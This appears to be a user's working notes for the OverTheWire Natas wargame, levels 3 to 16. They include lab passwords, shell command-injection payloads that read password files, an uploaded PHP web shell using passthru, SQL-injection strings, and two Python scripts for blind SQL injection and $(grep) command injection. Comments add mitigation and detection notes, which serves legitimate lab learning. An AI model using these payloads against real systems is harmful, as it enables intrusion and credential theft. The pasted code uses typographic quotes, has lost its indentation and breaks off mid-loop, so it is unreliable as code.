3 Not even Google will find it this time
http://natas3.natas.labs.overthewire.org/robots.txt
4 tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm
change Referer:
9 command injection
;cat /etc/natas_webpass/natas10
the ; separates the injected command from the grep -i command
-
command injection
. /etc/natas_webpass/natas11
nano natas11.php
<? passthru("cat /etc/natas_webpass/natas13");?>
curl -u natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas12.natas.labs.overthewire.org/ -F "uploadedfile=@natas11.php" -F "filename=natas11.php"
burpsuite:
change jpg to php
nano natas11.php
GIF87a
curl -u natas13:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas13.natas.labs.overthewire.org/ -F "uploadedfile=@natas11.php" -F "filename=natas11.php"
burpsuite:
change jpg to php
Content-Disposition: form-data; name="filename"
rc74vy46dy.php
- sql injection
"+or+1=1#
15 sql injection
username=natas16"+AND+LENGTH(password)>n#
username=natas16"+AND+substr(password,1,1)+like+binary+"%A%"#
BINARY: use it when the SQL comparison is not sensitive to lowercase vs uppercase (it forces a case-sensitive match)
n=32
TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
# Natas 15 notes: boolean-based blind SQL injection, one password character per request.
# The only oracle the script reads is whether the response contains "This user exists"
# (checked below), so the password is extended prefix by prefix with a case-sensitive
# LIKE BINARY match.
# Mitigation: a parameterized query (prepared statement) with the username bound as a
# value removes the injection point. Detection: the oracle leaves a clear trace, a burst
# of requests from one client whose username parameter differs only by a growing LIKE prefix.
# NOTE(review): this paste has lost its indentation and uses typographic quotes, so it
# does not parse as shown.
target = ‘http://natas15.natas.labs.overthewire.org’
# Reduced candidate alphabet; the note above records n=32 as the password length.
charset_1 = “adfgijklqruADEHOPRTVZ23579”
password = “”
# Loop until all 32 characters have been recovered.
while len(password) != 32:
for c in charset_1:
# Candidate prefix: everything known so far plus one more character.
t = password + c
# Injected value: closes the username literal, adds a LIKE BINARY test on the candidate
# prefix, and ends with a quote meant to pair with the query's own closing quote.
username = (‘natas16" AND password LIKE BINARY "’ + t +‘%" "’)
r = requests.get(target,
auth=(‘natas15’,‘TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB’),
params={“username”: username}
)
# "This user exists" is the only signal read from the response: its presence is treated
# as "the candidate prefix matched", so t becomes the new known prefix.
if “This user exists” in r.text:
print ('PASS: ’ + t.ljust(32, ‘*’))
password = t
break
16…
import requests
from requests.auth import HTTPBasicAuth
# Natas 16 notes: OS command injection through the needle parameter. Judging by the
# request below, the value is spliced into a server-side grep, so a $(...) substitution
# runs first; if the inner grep matches `char` in the password file, its output replaces
# the substitution and the outer search for "doomed" no longer matches. The script
# therefore reads the absence of "doomed" in the response as "char occurs in the file".
# Mitigation: never build a shell command from request input; invoke grep with an
# argument vector (no shell) and allow-list the needle to the characters a search needs.
# Detection: `$(` or backticks inside a search parameter are a reliable log/WAF signature.
auth=HTTPBasicAuth(‘natas16’, ‘TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V’)
# Characters found to be present in the target password, in order of discovery
# (alphabet order), not in password position.
filteredchars = ‘’
# Unused in this stretch; presumably filled by the position loop that starts below,
# which is cut off in this paste.
passwd = ‘’
# Full alphanumeric alphabet, probed one character per request.
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’
for char in allchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ’ + char + ’ /etc/natas_webpass/natas17)’, auth=auth)
# "doomed" missing from the page means the injected grep produced output.
if ‘doomed’ not in r.text:
filteredchars = filteredchars + char
print(filteredchars)
for i in range